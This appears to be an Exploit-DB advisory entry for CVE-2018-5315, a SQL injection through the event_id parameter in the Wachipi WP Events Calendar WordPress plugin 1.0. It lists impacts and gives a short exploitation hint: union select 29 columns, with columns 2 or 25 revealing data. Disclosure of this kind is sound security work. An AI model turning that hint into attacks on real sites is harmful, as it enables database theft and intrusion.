WordPress Plugin Events Calendar - 'event_id' SQL Injection

EDB-ID: 43479
Author: Dennis Veninga
Published: 2018-01-10
CVE: CVE-2018-5315
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 # Date: 09-01-2018 
# Exploit Author: Dennis Veninga
# Contact Author: d.veninga [at] networking4all.com
# Vendor Homepage: codecanyon.net/user/wachipi
# Version: 1.0
# CVE-ID: CVE-2018-5315

Events Calendar allows you to easily add to your website a powerful
interactive calendar to present your events.

Found 09-01-18
Vendor reply & fix 09-01-2018

The Wachipi WP Events Calendar plugin 1.0 for WordPress has SQL Injection
via the event_id parameter to event.php.

NOTE: this plugin is NOT related to the Modern Tribe Events Calendar plugin.

[Additional Information]

[Vulnerability Type]
SQL Injection

[Vendor of Product]
https://codecanyon.net/item/wp-events-calendar-plugin/5025660 Wachipi

[Affected Product Code Base]
Events Calendar - 1.0

[Affected Component]

[Attack Type]

[Impact Code execution]

[Impact Escalation of Privileges]

[Impact Information Disclosure]

[Attack Vectors]
To exploit, union select 29 columns. User can use 2 or 25 for information

Dennis Veninga @ Networking4all.com

Related Posts